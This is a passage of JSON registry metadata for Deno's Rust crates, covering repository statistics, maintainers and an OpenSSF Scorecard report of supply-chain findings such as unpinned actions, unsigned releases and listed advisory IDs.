2105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npmrc/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-04-26T11:44:01.831Z","updated_at":"2026-04-26T11:44:01.831Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-04-26T11:44:01.967Z","updated_at":"2026-04-26T11:44:01.967Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047489,"name":"deno_tls","ecosystem":"cargo","description":"TLS for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":244,"first_release_published_at":"2021-08-10T11:27:02.515Z","latest_release_published_at":"2026-08-06T11:45:09.831Z","latest_release_number":"0.244.0","last_synced_at":"2026-08-29T21:57:04.023Z","created_at":"2022-04-12T10:01:12.030Z","updated_at":"2026-08-30T02:55:30.497Z","registry_url":"https://crates.io/crates/deno_tls/","install_command":"cargo install deno_tls","documentation_url":"https://docs.rs/deno_tls/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed 